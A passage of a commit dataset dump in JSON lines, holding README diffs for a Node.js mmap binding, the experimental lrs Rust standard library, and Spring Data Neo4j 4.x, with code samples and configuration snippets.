[, advise = 0]] ) -> Buffer\n\nsize = fs.stat-sync(fd).size\nrx-prot = mmap.PROT_READ .|. mmap.PROT_EXECUTE\npriv = mmap.MAP_SHARED\n\nbuffer = mmap.map size, rx-prot, priv, fd\nbuffer2 = mmap.map size, mmap.PROT_READ, priv, fd, 0, mmap.MADV_SEQUENTIAL\nw-buffer = mmap.map size, mmap.PROT_WRITE, priv, fd-w\n\n# advise( buffer, advise ) -> void\n# advise( buffer, offset, length, advise ) -> void\n\nmmap.advise w-buffer, mmap.MADV_RANDOM\n\n# sync( buffer ) -> void\n# sync( buffer, offset, length ) -> void\n# sync( buffer, is-blocking-sync[, do-page-invalidation = false] ) -> void\n# sync( buffer, offset = 0, length = buffer.length [, is-blocking-sync = false [, do-page-invalidation = false]] ) -> void\n\nw-buffer[47] = 42\nmmap.sync w-buffer\nmmap.sync w-buffer, true\nmmap.sync w-buffer, 0, size\nmmap.sync w-buffer, 0, size, true\nmmap.sync w-buffer, 0, size, true, false\n\n# Yeah, you will do _one_ of the variants ofcourse..\n--------------------------------------------------------------------------------------------------------------------------\n\n[[good-to-know-tm]]\nGood to Know (TM)\n^^^^^^^^^^^^^^^^^\n\n* Checkout man pages mmap(2), madvise(2) and msync(2) for more detailed\nintell.\n* The mappings is automatically unmapped when the buffer is garbage\ncollected.\n* Write-mappings need the fd to be opened with \"r+\", or you'll get a\npermission error (13).\n* If you make a read-only mapping and then ignorantly set a value in the\nbuffer, all hell previously unknown to a JS'er breaks loose\n(segmentation fault). It is possible to write some devilous code to\nintercept the SIGSEGV and throw an exception, but let's not do that!\n* `Offset`, and in some cases `length` needs to be a multiple of\nmmap-io.PAGESIZE (which commonly is 4096)\n\n[[tests]]\nTests\n-----\n\n--------------\nnode .\/test.js\n--------------\n\n[[todo-not-todo-and-stuff]]\nTodo, Not Todo and Stuff\n------------------------\n\n* More tests\n* Huge pages are only supported for anonymous \/ private mappings (well,\nin Linux), so I didn't throw in flags for that since I found no use.\n* As Ben Noordhuis previously has stated: Supplying hint for a fixed\nvirtual memory adress is kinda moot point in JS, so not supported.\n* If you miss a feature - contribute! Or request it in an issue. I might\nadd it. I intend to maintain this module since it will be part of a\ngreat deal of code I'm working on.\n* If documentation isn't clear, make an issue.\n\n[[contributions]]\nContributions\n-------------\n\nPlease PR to 'develop' branch.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f70a55d48512e7fa046844b316de7db96c59fe77","subject":"autocommit 2015-11-10 22:02:23 CET","message":"autocommit 2015-11-10 22:02:23 CET\n","repos":"lrs-lang\/lib,lrs-lang\/lib","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= *lrs*\n:toc: macro\nifdef::env-github[:build_link: link:Documentation\/adoc\/building_and_using.adoc]\nifndef::env-github[:build_link: link:Documentation\/html\/building_and_using.html]\n:logo: assets\/logo.png\n:source-language: rust\n\nimage::{logo}[logo,float=\"left\"]\n\nlrs is a highly experimental, linux-only standard library for the rustc\ncompiler. It does not use any parts of the standard library that is part of the\nrust distribution.\n\n'''\n\ntoc::[]\n\n== Features\n\nSince lrs is based on the rust compiler, it shares many features with rust\n(e.g., lifetimes, borrow checking, integer overflow checking, etc.) But rustc\nallows us to make significant chages to the language as long as we don't use\nMozilla's standard library. This section lists some of the differences between\nrust and lrs and other features of lrs.\n\nNOTE: In this section we'll compare programs compiled against lrs and programs\ncompiled against the \"standard\" standard library that comes with the rust\ndistribution. To make things simpler, we will call programs that use lrs \"lrs\nprograms\" and programs that use Mozilla's standard library \"rust programs\". It\nshould be clear from the context what is meant.\n\n=== No unwinding\n\nUnwinding and the `panic` macro have been removed from lrs. This means that\nerror handling works via return values or--in the case of unrecoverable\nerrors--process termination. This has the following advantages:\n\nPotentially better performance:: Consider the following function:\n+\n[source]\n----\nfn f(a: &mut u8, b: &mut u8, g: fn()) {\n mem::swap(a, b);\n g();\n mem::swap(a, b);\n}\n----\n+\nIf `g` cannot unwind, then this function can be optimized by removing both\n`swap` calls. But if `g` can unwind, then the `swap` calls must stay in place\nsince destructors called during unwinding might access `a` and `b`.\n\nNo exception unsafety:: Consider the following (incorrect) rust code:\n+\n[source]\n----\nfn push(a: &mut Vec<T>, g: fn() -> T) {\n unsafe {\n assert!(a.capacity() > a.len());\n let len = a.len();\n a.set_len(len + 1); \/\/ <-- BUG\n ptr::write(a.as_mut_ptr().offset(len as isize), g());\n }\n}\n----\n+\nThis is a naive implementation of a non-allocating `push` method on `Vec<T>`.\nThe code is incorrect because the length of the vector is increased before the\nreturn value of `g` has been written to it. If `g` unwinds, the destructor of\n`Vec<T>` will access the invalid value at `a[len]`, which is likely undefined\nbehavior. This problem does not exist in lrs. See\nhttps:\/\/github.com\/rust-lang\/rfcs\/pull\/1236[this] (long) thread for a discussion\nof exception safety in rust.\n\n=== Small executables\n\n:calc_url: http:\/\/is.gd\/Ep2KIi\n\nlrs programs usually compile down to executable with a size comparable to that\nof equivalent C programs.\n\nIn the table below, `lrs + musl` denotes programs that were statically compiled\nagainst musl, and `lrs - libc` denotes programs that don't depend on a libc.\n\n|===\n|Name |lrs + glibc |lrs + musl |lrs - libc |C (glibc) |rust\n\n|Hello World |7.0KB |4.0KB |1.3KB |6.5KB |436KB\n\n|http:\/\/pubs.opengroup.org\/onlinepubs\/9699919799\/utilities\/test.html[test]footnote:[Note\nthat the different implementations do not necessarily implement the same\nfeatures.]\n|18KB\n|21KB\n|n\/a\n|35KB\n|462KB\n\n|{calc_url}[A calculator]\n|9.2KB\n|5.8KB\n|n\/a\n|n\/a\n|437KB\n|===\n\nNOTE: All programs were compiled with the `-O -C lto` flags.\n\n=== Direct system calls\n\nlrs interact with the kernel directly through system calls. That is, lrs does\nnot depend on a libc for 99% of the work. This allows us to use kernel features\nthat do not (yet) have an equivalent libc function and removes an unnecessary\nlayer of abstraction.\n\nIt is, in fact, possible to use lrs without a libc. However, this mode is not\nyet fully developed and mostly useful for testing cross-compilation.\n\n=== glibc and musl support\n\nDue to what was discussed in the previous section, the lrs\/libc interface is so\nsmall that it's almost trivial to make lrs work with different libc versions.\nCurrently, lrs is known to work with glibc and musl.\n\n=== Portable\n\nEven though lrs avoids the libc abstraction layer, porting lrs to new linux\nplatforms is easy. This is due to the way the platform dependent parts of lrs\nmirror the equivalent parts in the linux kernel source code. lrs has already\nbeen ported to *x86_64*, *x32*, *i686*, *arm*, and *arm64*.\n\nWARNING: lrs has only been tested on *x86_64*.\n\n=== Per-object allocators\n\nMany allocating structures in lrs (such as vectors, strings, hashmaps) come\nwith an optional allocator argument. The following allocators are part of lrs:\n\nLibc:: Uses `malloc` and friends from the libc.\nJeMalloc:: Uses jemalloc's non-standard API with sized allocations and\ndeallocations for higher efficiency.\nNoMem:: This dummy-allocator always reports an out-of-memory condition.\nBda:: The *brain-dead allocator* only allocates in multiples of the page size.\nThis is very useful for applications that have few allocations whose size is\nunknown at compile time and can rapidly increase.\n\nCareful note should be taken of the *NoMem* allocator. Consider the following\ncode:\n----\nlet mut buf = [0; 20];\nlet mut vec = Vec::buffered(&mut buf);\nwrite!(&mut vec, \"Hello World {}\", 10).unwrap();\nassert!(&*vec == \"Hello World 10\");\n----\nThe vector is backed by the *NoMem* allocator and the buffer declared in the\nfirst line. It will never dynamically allocate any memory. If we were to write\nmore bytes than can be stored in the buffer, `write!` would return that the\nvector is out of memory. Using this feature, lrs often allows the user to avoid\nallocations in cases where doing so would be rather inconvenient in rust.\n\nNevertheless, it's easy to use lrs collections in the common case where the user\ndoes not care about dynamic allocations. This is because all collections declare\na default allocator so that `Vec<T>` is the same as `Vec<T, Heap>`. This default\nallocator can be chosen at compile time.\n\n=== No allocations in the 99.9% case\n\nAll APIs are designed to not allocate memory in the common case. For example,\n`File::open` will only allocate memory if the requested path is longer than\n`PATH_MAX`. In those cases the API uses the so called fallback allocator. If\nthe user does not want memory to be allocated in those exceptional situations,\nhe can disable said allocator at compile time.\n\n=== Fast compilation\n\nlrs split into many small crates and provides incremental compilation\nindependent of the rustc compiler. Compiling a single crate during development\noften takes less than a second. To this end, lrs comes with its own\nbuild system--lrs_build, discussed below--which ensures that only the minimal\namount of work is done by the compiler.\n\nFurthermore, even complete builds do not take very long. On this (old) machine,\na complete build takes 28 seconds without optimization and 41 seconds with\noptimization.\n\n=== Extensive Linux API coverage\n\nlrs already wraps many of the commonly used linux system calls.\n\nNOTE: Some system calls (such as `vmsplice`) are fundamentally unsafe so that\nlrs will likely never provide safe wrappers for them.\n\n=== Easy to use\n\nEven though lrs programs don't use the standard library that comes with the\ncompiler, the user doesn't have to bother with annoying annotations. For\nexample, the following lrs program can be compiled as written:\n\n[source]\n----\nuse std::tty::{is_a_tty};\n\nfn main() {\n if is_a_tty(&1) {\n println!(\"stdout is a tty\");\n } else {\n println!(\"stdout is not a tty\");\n }\n}\n----\n\nThis is because lrs comes with its own compiler driver that takes care of\ninjecting lrs instead of rust.\n\n=== Concise documentation\n\n*lrs* docs do not try to be a Rust tutorial and are kept short and to the point,\nwith the expectation that most APIs are designed well enough to be understood\nwithout any help. When appropriate, we reference Linux manual pages. On the\nother hand, unsafe APIs and those that are used in unsafe code are explained in\ngreat detail.\n\n== Todo\n\nThere are still many things to do\n\n== Building and Using\n\nPlease see the detailed {build_link}[Building and Using] guide.\n\n== License\n\n:license: link:LICENSE\n\nThe whole library is licensed under the {license}[*MPL 2.0*] license which\nallows static linking into proprietary programs. It is copy-left on a\nfile-by-file basis: Changes to files licensed under the *MPL 2.0* have to be\ndistributed under the same license. It also allows the code to be freely used\nunder several (L)GPL licenses.\n\nSome other parts--such as the compiler plugin and the compiler driver--are\nlicensed under the MIT license.\n\n== Logo\n\n:simple-linux-logo: http:\/\/dablim.deviantart.com\/art\/Simple-Linux-Logo-336131202\n:dablim: http:\/\/dablim.deviantart.com\/\n:ccby: http:\/\/creativecommons.org\/licenses\/by-sa\/4.0\/\n\nThe lrs link:{logo}[logo] shows a penguin in a sprocket.\n\nIt is based on {simple-linux-logo}[Simple Linux Logo] by {dablim}[Dablim] and is\nlicensed under {ccby}[CC BY-SA 4.0].\n","old_contents":"= *lrs*\n:toc: macro\nifdef::env-github[:build_link: link:Documentation\/adoc\/building_and_using.adoc]\nifndef::env-github[:build_link: link:Documentation\/html\/building_and_using.html]\n:logo: assets\/logo.png\n:source-language: rust\n\nimage::{logo}[logo,float=\"left\"]\n\nlrs is a highly experimental, linux-only standard library for the rustc\ncompiler. It does not use any parts of the standard library that is part of the\nrust distribution.\n\n'''\n\ntoc::[]\n\n== Features\n\nSince lrs is based on the rust compiler, it shares many features with rust\n(e.g., lifetimes, borrow checking, integer overflow checking, etc.) But rustc\nallows us to make significant chages to the language as long as we don't use\nMozilla's standard library. This section lists some of the differences between\nrust and lrs and other features of lrs.\n\nNOTE: In this section we'll compare programs compiled against lrs and programs\ncompiled against the \"standard\" standard library that comes with the rust\ndistribution. To make things simpler, we will call programs that use lrs \"lrs\nprograms\" and programs that use Mozilla's standard library \"rust programs\". It\nshould be clear from the context what is meant.\n\n=== No unwinding\n\nUnwinding and the `panic` macro have been removed from lrs. This means that\nerror handling works via return values or--in the case of unrecoverable\nerrors--process termination. This has the following advantages:\n\nPotentially better performance:: Consider the following function:\n+\n[source,rust]\n----\nfn f(a: &mut u8, b: &mut u8, g: fn()) {\n mem::swap(a, b);\n g();\n mem::swap(a, b);\n}\n----\n+\nIf `g` cannot unwind, then this function can be optimized by removing both\n`swap` calls. But if `g` can unwind, then the `swap` calls must stay in place\nsince destructors called during unwinding might access `a` and `b`.\n\nNo exception unsafety:: Consider the following (incorrect) rust code:\n+\n----\nfn push(a: &mut Vec<T>, g: fn() -> T) {\n unsafe {\n assert!(a.capacity() > a.len());\n let len = a.len();\n a.set_len(len + 1); \/\/ <-- BUG\n ptr::write(a.as_mut_ptr().offset(len as isize), g());\n }\n}\n----\n+\nThis is a naive implementation of a non-allocating `push` method on `Vec<T>`.\nThe code is incorrect because the length of the vector is increased before the\nreturn value of `g` has been written to it. If `g` unwinds, the destructor of\n`Vec<T>` will access the invalid value at `a[len]`, which is likely undefined\nbehavior. This problem does not exist in lrs. See\nhttps:\/\/github.com\/rust-lang\/rfcs\/pull\/1236[this] (long) thread for a discussion\nof exception safety in rust.\n\n=== Small executables\n\n:calc_url: http:\/\/is.gd\/Ep2KIi\n\nlrs programs usually compile down to executable with a size comparable to that\nof equivalent C programs.\n\nIn the table below, `lrs + musl` denotes programs that were statically compiled\nagainst musl, and `lrs - libc` denotes programs that don't depend on a libc.\n\n|===\n|Name |lrs + glibc |lrs + musl |lrs - libc |C (glibc) |rust\n\n|Hello World |7.0KB |4.0KB |1.3KB |6.5KB |436KB\n\n|http:\/\/pubs.opengroup.org\/onlinepubs\/9699919799\/utilities\/test.html[test]footnote:[Note\nthat the different implementations do not necessarily implement the same\nfeatures.]\n|18KB\n|21KB\n|n\/a\n|35KB\n|462KB\n\n|{calc_url}[A calculator]\n|9.2KB\n|5.8KB\n|n\/a\n|n\/a\n|437KB\n|===\n\nNOTE: All programs were compiled with the `-O -C lto` flags.\n\n=== Direct system calls\n\nlrs interact with the kernel directly through system calls. That is, lrs does\nnot depend on a libc for 99% of the work. This allows us to use kernel features\nthat do not (yet) have an equivalent libc function and removes an unnecessary\nlayer of abstraction.\n\nIt is, in fact, possible to use lrs without a libc. However, this mode is not\nyet fully developed and mostly useful for testing cross-compilation.\n\n=== glibc and musl support\n\nDue to what was discussed in the previous section, the lrs\/libc interface is so\nsmall that it's almost trivial to make lrs work with different libc versions.\nCurrently, lrs is known to work with glibc and musl.\n\n=== Portable\n\nEven though lrs avoids the libc abstraction layer, porting lrs to new linux\nplatforms is easy. This is due to the way the platform dependent parts of lrs\nmirror the equivalent parts in the linux kernel source code. lrs has already\nbeen ported to *x86_64*, *x32*, *i686*, *arm*, and *arm64*.\n\nWARNING: lrs has only been tested on *x86_64*.\n\n=== Per-object allocators\n\nMany allocating structures in lrs (such as vectors, strings, hashmaps) come\nwith an optional allocator argument. The following allocators are part of lrs:\n\nLibc:: Uses `malloc` and friends from the libc.\nJeMalloc:: Uses jemalloc's non-standard API with sized allocations and\ndeallocations for higher efficiency.\nNoMem:: This dummy-allocator always reports an out-of-memory condition.\nBda:: The *brain-dead allocator* only allocates in multiples of the page size.\nThis is very useful for applications that have few allocations whose size is\nunknown at compile time and can rapidly increase.\n\nCareful note should be taken of the *NoMem* allocator. Consider the following\ncode:\n----\nlet mut buf = [0; 20];\nlet mut vec = Vec::buffered(&mut buf);\nwrite!(&mut vec, \"Hello World {}\", 10).unwrap();\nassert!(&*vec == \"Hello World 10\");\n----\nThe vector is backed by the *NoMem* allocator and the buffer declared in the\nfirst line. It will never dynamically allocate any memory. If we were to write\nmore bytes than can be stored in the buffer, `write!` would return that the\nvector is out of memory. Using this feature, lrs often allows the user to avoid\nallocations in cases where doing so would be rather inconvenient in rust.\n\nNevertheless, it's easy to use lrs collections in the common case where the user\ndoes not care about dynamic allocations. This is because all collections declare\na default allocator so that `Vec<T>` is the same as `Vec<T, Heap>`. This default\nallocator can be chosen at compile time.\n\n=== No allocations in the 99.9% case\n\nAll APIs are designed to not allocate memory in the common case. For example,\n`File::open` will only allocate memory if the requested path is longer than\n`PATH_MAX`. In those cases the API uses the so called fallback allocator. If\nthe user does not want memory to be allocated in those exceptional situations,\nhe can disable said allocator at compile time.\n\n=== Fast compilation\n\nlrs split into many small crates and provides incremental compilation\nindependent of the rustc compiler. Compiling a single crate during development\noften takes less than a second. To this end, lrs comes with its own\nbuild system--lrs_build, discussed below--which ensures that only the minimal\namount of work is done by the compiler.\n\nFurthermore, even complete builds do not take very long. On this (old) machine,\na complete build takes 28 seconds without optimization and 41 seconds with\noptimization.\n\n=== Extensive Linux API coverage\n\nlrs already wraps many of the commonly used linux system calls.\n\nNOTE: Some system calls (such as `vmsplice`) are fundamentally unsafe so that\nlrs will likely never provide safe wrappers for them.\n\n=== Easy to use\n\nEven though lrs programs don't use the standard library that comes with the\ncompiler, the user doesn't have to bother with annoying annotations. For\nexample, the following lrs program can be compiled as written:\n\n----\nuse std::tty::{is_a_tty};\n\nfn main() {\n if is_a_tty(&1) {\n println!(\"stdout is a tty\");\n } else {\n println!(\"stdout is not a tty\");\n }\n}\n----\n\nThis is because lrs comes with its own compiler driver that takes care of\ninjecting lrs instead of rust.\n\n=== Concise documentation\n\n*lrs* docs do not try to be a Rust tutorial and are kept short and to the point,\nwith the expectation that most APIs are designed well enough to be understood\nwithout any help. When appropriate, we reference Linux manual pages. On the\nother hand, unsafe APIs and those that are used in unsafe code are explained in\ngreat detail.\n\n== Todo\n\nThere are still many things to do\n\n== Building and Using\n\nPlease see the detailed {build_link}[Building and Using] guide.\n\n== License\n\n:license: link:LICENSE\n\nThe whole library is licensed under the {license}[*MPL 2.0*] license which\nallows static linking into proprietary programs. It is copy-left on a\nfile-by-file basis: Changes to files licensed under the *MPL 2.0* have to be\ndistributed under the same license. It also allows the code to be freely used\nunder several (L)GPL licenses.\n\nSome other parts--such as the compiler plugin and the compiler driver--are\nlicensed under the MIT license.\n\n== Logo\n\n:simple-linux-logo: http:\/\/dablim.deviantart.com\/art\/Simple-Linux-Logo-336131202\n:dablim: http:\/\/dablim.deviantart.com\/\n:ccby: http:\/\/creativecommons.org\/licenses\/by-sa\/4.0\/\n\nThe lrs link:{logo}[logo] shows a penguin in a sprocket.\n\nIt is based on {simple-linux-logo}[Simple Linux Logo] by {dablim}[Dablim] and is\nlicensed under {ccby}[CC BY-SA 4.0].\n","returncode":0,"stderr":"","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"2af7297d4dfebfbf0117a4f53af8f7b01877ce8c","subject":"DATAGRAPH-823 - Switch master branch to SDN 4.x.","message":"DATAGRAPH-823 - Switch master branch to SDN 4.x.\n\nFixed typos.","repos":"espiegelberg\/spring-data-neo4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"[NOTE]\nThis branch (master) now points to Spring Data Neo4j 4.x the *new* implementation that is based on http:\/\/github.com\/neo4j\/neo4j-ogm[Neo4j-OGM].\n\n= Spring Data Neo4j 4.x - Quick start\n\n[source,java]\n----\n@NodeEntity\nclass Person {\n private Long id;\n private String name;\n\n @Relationship(type = \"FRIEND\", direction = \"UNDIRECTED\")\n private Set<Person> friends;\n\n public Person() {}\n public Person(String name) { this.name = name; }\n\n private void knows(Person friend) { friends.add(friend); }\n}\n\npublic interface PersonRepository extends GraphRepository<Person> {\n}\n\nPerson jon = new Person(\"Jon\");\nPerson emil = new Person(\"Emil\");\nPerson rod = new Person(\"Rod\");\n\nemil.knows(jon);\nemil.knows(rod);\n\n\/\/ Persist entities and relationships to graph database\npersonRepository.save(emil);\n\nfor (Person friend : emil.getFriends()) {\n System.out.println(\"Friend: \" + friend);\n}\n\n\/\/ Control loading depth\njon = personRepository.findOne(id, 2);\nfor (Person friend : jon.getFriends()) {\n System.out.println(\"Jon's friends to depth 2: \" + friend);\n}\n----\n\n== About\n\nThe primary goal of the http:\/\/projects.spring.io\/spring-data[Spring Data] project is to make it more convenient and consistent to build Spring-based applications that use modern data technologies.\nSpring Data Neo4j integrates the leading http:\/\/neo4j.com\/[Neo4j] Graph Database.\n\nThe Spring Data Neo4j project provides a simplified POJO based programming model that reduces that amount of boilerplate code needed to create Neo4j applications.\n\nIt supports:\n\n* automatic mapping annotated domain entities for nodes and relationships\n* interface based repositories with provided, derived, and annotated finder methods\n* transaction control\n* multi-transport (embedded, http, [bolt])\n* exception translation\n* integration into Spring Data REST\n* works well within Spring Boot\n\n== Using Spring Data Neo4j\n\n=== Maven configuration\n\n* Add the maven repository and dependency:\n\n.pom.xml\n[source,xml]\n----\n<dependencies>\n <dependency>\n <groupId>org.springframework.data<\/groupId>\n <artifactId>spring-data-neo4j<\/artifactId>\n <version>4.1.0.BUILD-SNAPSHOT<\/version> <!-- or .M1 when released -->\n <\/dependency>\n<\/dependencies>\n<repositories>\n <repository>\n <id>spring-maven-snapshot<\/id>\n <snapshots><enabled>true<\/enabled><\/snapshots>\n <name>Springframework Maven MILESTONE Repository<\/name>\n <url>http:\/\/maven.springframework.org\/milestone<\/url>\n <\/repository>\n<\/repositories>\n----\n\n\n=== Spring configuration\n\n* Configure Spring Data Neo4j 4.1 in your application using Java-based bean configuration\n\n.MyConfiguration.java\n[source,java]\n----\n@Configuration\n@EnableNeo4jRepositories(basePackages = \"com.example.person.repository\",...)\n@EnableTransactionManagement\npublic class MyConfiguration extends Neo4jConfiguration {\n\n @Bean\n public SessionFactory getSessionFactory() {\n \/\/ with domain entity base package(s)\n return new SessionFactory(\"com.example.person.domain\",...);\n }\n\n \/\/ needed for session in view in web-applications\n @Bean\n @Scope(value = \"session\", proxyMode = ScopedProxyMode.TARGET_CLASS)\n public Session getSession() throws Exception {\n return super.getSession();\n }\n\n}\n----\n\nSpring Data Neo4j 4.1 provides support for connecting to Neo4j using different drivers.\nHTTP and Embedded drivers are available. \nSpring Data Neo4j will attempt to auto-configure itself using a file called `ogm.properties`, which it expects to find on the classpath.\n\n.ogm.properties\n[source,java]\n----\ndriver=org.neo4j.ogm.drivers.http.driver.HttpDriver\nURI=http:\/\/user:password@localhost:7474\n----\n\nThe application can be configured programmatically as well, please http:\/\/docs.spring.io\/spring-data\/data-neo4j\/docs\/current\/reference\/html\/#_spring_configuration[read the reference guide] for more information.\n\n=== Graph entities\n\n* Annotate your entity class. In this case it is a 'Person' class that has a relationship to the 'Company' they work at :\n\n[source,java]\n----\npackage com.example.person.domain;\n\n@NodeEntity\nclass Person {\n private Long id;\n private String name;\n\n @Relationship(type = \"WORKS_AT\", direction = \"OUTGOING\")\n private Company employer;\n\n public Person() {}\n public Person(String name) { this.name = name; }\n\n private void worksAt(Company employer) { this.employer = employer; }\n}\n----\n\n=== Transactional services\n\nCreate a repository or service to perform typical operations on your entities. \nThe complete functionality is covered in the http:\/\/docs.spring.io\/spring-data\/data-neo4j\/docs\/current\/reference\/html\/#reference_programming-model[reference manual]\n\n[source,java]\n----\npackage com.example.person.repository;\n\npublic interface PersonRepository extends GraphRepository<Person> {\n\n \/\/ derived finder method\n Person findByName(String name);\n \n @Query(\"MATCH (c:Company)<-[:WORKS_AT]-(p:Person) WHERE id(c) = {company} RETURN p\")\n List<Person> findEmployees(Company company);\n}\n\npackage com.example.person.service;\n\n@Service\n@Transactional\npublic class EmployeeService {\n\n @Autowired\n private PersonRepository personRepository;\n\n public int getNumberOfPeople() {\n return personRepository.count();\n }\n\n public Person createPerson(String name) {\n return personRepository.save(new Person(name));\n }\n\n public List<Person> getAllPeople() {\n return personRepository.findAll();\n }\n\n public List<Person> getEmployees(Company c) {\n return personRepository.findEmployees(c);\n }\n}\n----\n\nPlease see the https:\/\/github.com\/neo4j-examples\/sdn4-university\/tree\/4.1[SDN University sample project] for more information.\n\nMore example projects for Spring Data Neo4j 4 are available in the https:\/\/github.com\/neo4j-examples?query=sdn4[Neo4j-Examples] repository\n\n== Getting Help\n\nThis README and the http:\/\/static.springsource.org\/spring-data\/data-neo4j\/docs\/current\/reference\/html\/[Reference Manual] are the best places to start learning about Spring Data Neo4j 4.\n\nThe main http:\/\/projects.spring.io.org\/spring-data-neo4j[SpringSource project site] contains links to basic project information such as source code, JavaDocs, Issue tracking, etc.\n\nFor more detailed questions, use the \"forum\":http:\/\/forum.springsource.org\/forumdisplay.php?f=80. If you are new to Spring as well as to Spring Data, look for information about \"Spring projects\":http:\/\/www.springsource.org\/projects.\n\n\nYou will also find help on http:\/\/stackoverflow.com\/questions\/tagged\/spring-data-neo4j[StackOverflow]\n\n== Contributing to Spring Data Neo4j\n\nThere are dedicated, mandatory https:\/\/github.com\/spring-projects\/spring-data-build\/blob\/master\/CONTRIBUTING.adoc[contribution guidelines] for all Spring Data projects.\n\nHere are some ways for you to get involved in the community:\n\n* Get involved with Spring Data Neo4j community on the http:\/\/groups.google.com\/group\/neo4j[Neo4j Google Group] and by helping on http:\/\/stackoverflow.com\/questions\/tagged\/spring-data-neo4j[StackOverflow].\n* Create https:\/\/jira.springframework.org\/browse\/DATAGRAPH[JIRA] tickets for bugs and new features and comment and vote on the ones that you are interested in.\n* Github is for social coding: if you want to write code, we encourage contributions through *pull requests* from a fork of this repository.\n If you want to contribute code this way, please read the https:\/\/github.com\/spring-projects\/spring-data-build\/blob\/master\/CONTRIBUTING.adoc[contribution guidelines] for details.\n","old_contents":"[NOTE]\nThis branch (master) now points to Spring Data Neo4j 4.x the *new* implementation that is based on http:\/\/github.com\/neo4j\/neo4j-ogm[Neo4j-OGM].\n\n= Spring Data Neo4j 4.x - Quick start\n\n[source,java]\n----\n@NodeEntity\nclass Person {\n private Long id;\n private String name;\n\n @Relationship(type = \"FRIEND\", direction = \"UNDIRECTED\")\n private Set<Person> friends;\n\n public Person() {}\n public Person(String name) { this.name = name; }\n\n private void knows(Person friend) { friends.add(friend); }\n}\n\npublic interface PersonRepository extends GraphRepository<Person> {\n}\n\nPerson jon = new Person(\"Jon\");\nPerson emil = new Person(\"Emil\");\nPerson rod = new Person(\"Rod\");\n\nemil.knows(jon);\nemil.knows(rod);\n\n\/\/ Persist entities and relationships to graph database\npersonRepository.save(emil);\n\nfor (Person friend : emil.getFriends()) {\n System.out.println(\"Friend: \" + friend);\n}\n\n\/\/ Control loading depth\njon = personRepository.findOne(id, 2);\nfor (Person friend : jon.getFriends()) {\n System.out.println(\"Jon's friends to depth 2: \" + friend);\n}\n----\n\n== About\n\nThe primary goal of the http:\/\/projects.spring.io\/spring-data[Spring Data] project is to make it more convenient and consistent to build Spring-based applications that use modern data technologies.\nSpring Data Neo4j integrates the leading http:\/\/neo4j.com\/[Neo4j] Graph Database.\n\nThe Spring Data Neo4j project provides a simplified POJO based programming model that reduces that amount of boilerplate code needed to create Neo4j applications.\n\nIt supports:\n\n* automatic mapping annotated domain entities for nodes and relationships\n* interface based repositories with provided, derived, and annotated finder methods\n* transaction control\n* multi-transport (embedded, http, [bolt])\n* exception translation\n* integration into Spring Data REST\n* works well within Spring Boot\n\n== Using Spring Data Neo4j\n\n=== Maven configuration\n\n* Add the maven repository and dependency:\n\n.pom.xml\n[source,xml]\n----\n<dependencies>\n <dependency>\n <groupId>org.springframework.data<\/groupId>\n <artifactId>spring-data-neo4j<\/artifactId>\n <version>4.1.0.BUILD-SNAPSHOT<\/version> <!-- or .M1 when released -->\n <\/dependency>\n<\/dependencies>\n<repositories>\n <repository>\n <id>spring-maven-snapshot<\/id>\n <snapshots><enabled>true<\/enabled><\/snapshots>\n <name>Springframework Maven MILESTONE Repository<\/name>\n <url>http:\/\/maven.springframework.org\/milestone<\/url>\n <\/repository>\n<\/repositories>\n----\n\n\n=== Spring configuration\n\n* Configure Spring Data Neo4j 4.1 in your application using Java-based bean configuration\n\n.MyConfiguration.java\n[source,java]\n----\n@Configuration\n@EnableNeo4jRepositories(basePackages = \"org.neo4j.example.repository\")\n@EnableTransactionManagement\npublic class MyConfiguration extends Neo4jConfiguration {\n\n @Bean\n public SessionFactory getSessionFactory() {\n \/\/ with domain entity base package(s)\n return new SessionFactory(\"org.neo4j.example.domain\");\n }\n\n \/\/ needed for session in view in web-applications\n @Bean\n @Scope(value = \"session\", proxyMode = ScopedProxyMode.TARGET_CLASS)\n public Session getSession() throws Exception {\n return super.getSession();\n }\n\n}\n----\n\nSpring Data Neo4j 4.1 provides support for connecting to Neo4j using different drivers.\nHTTP and Embedded drivers are available. \nSpring Data Neo4j will attempt to auto-configure itself using a file called `ogm.properties`, which it expects to find on the classpath.\n\n.ogm.properties\n[source,java]\n----\ndriver=org.neo4j.ogm.drivers.http.driver.HttpDriver\nURI=http:\/\/user:password@localhost:7474\n----\n\nThe application can be configured programmatically as well, please http:\/\/docs.spring.io\/spring-data\/data-neo4j\/docs\/current\/reference\/html\/#_spring_configuration[read the reference guide] for more information.\n\n=== Graph entities\n\n* Annotate your entity class. In this case it is a 'Person' class that has a relationship to the 'Company' they work at :\n\n[source,java]\n----\n@NodeEntity\nclass Person {\n private Long id;\n private String name;\n\n @Relationship(type = \"WORKS_AT\", direction = \"OUTGOING\")\n private Company employer;\n\n public Person() {}\n public Person(String name) { this.name = name; }\n\n private void worksAt(Company employer) { this.employer = employer; }\n}\n----\n\n=== Transactional services\n\nCreate a repository or service to perform typical operations on your entities. \nThe complete functionality is covered in the http:\/\/docs.spring.io\/spring-data\/data-neo4j\/docs\/current\/reference\/html\/#reference_programming-model[reference manual]\n\n[source,java]\n----\npublic interface PersonRepository extends GraphRepository<Person> {\n\n \/\/ derived finder method\n Person findByName(String name);\n \n @Query(\"MATCH (:Company)<-[:WORKS_AT]-(p:Person) WHERE id(c) = {company} RETURN p\")\n List<Person> findEmployees(Company company);\n}\n\n@Service\n@Transactional\npublic class EmployeeService {\n\n @Autowired\n private PersonRepository personRepository;\n\n public int getNumberOfPeople() {\n return personRepository.count();\n }\n\n public Person createPerson(String name) {\n return personRepository.save(new Person(name));\n }\n\n public List<Person> getAllPeople() {\n return personRepository.findAll();\n }\n\n public List<Person> getEmployees(Company c) {\n return personRepository.findEmployees(c);\n }\n}\n----\n\nPlease see the https:\/\/github.com\/neo4j-examples\/sdn4-university\/tree\/4.1[SDN University sample project] for more information.\n\nMore example projects for Spring Data Neo4j 4 are available in the https:\/\/github.com\/neo4j-examples?query=sdn4[Neo4j-Examples] repository\n\n== Getting Help\n\nThis README and the http:\/\/static.springsource.org\/spring-data\/data-neo4j\/docs\/current\/reference\/html\/[Reference Manual] are the best places to start learning about Spring Data Neo4j 4.\n\nThe main http:\/\/projects.spring.io.org\/spring-data-neo4j[SpringSource project site] contains links to basic project information such as source code, JavaDocs, Issue tracking, etc.\n\nFor more detailed questions, use the 